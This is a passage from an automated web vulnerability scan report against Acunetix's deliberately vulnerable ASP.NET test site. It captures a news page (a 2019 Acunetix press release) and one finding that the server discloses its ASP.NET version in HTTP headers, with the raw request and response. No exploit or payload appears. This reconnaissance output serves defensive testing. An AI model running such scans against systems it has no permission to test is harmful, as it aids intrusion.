id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/M3rUCxcfpdy3AdSqGMGh3aLpuYg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMT Content-Length: 30393Response body (30393 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVka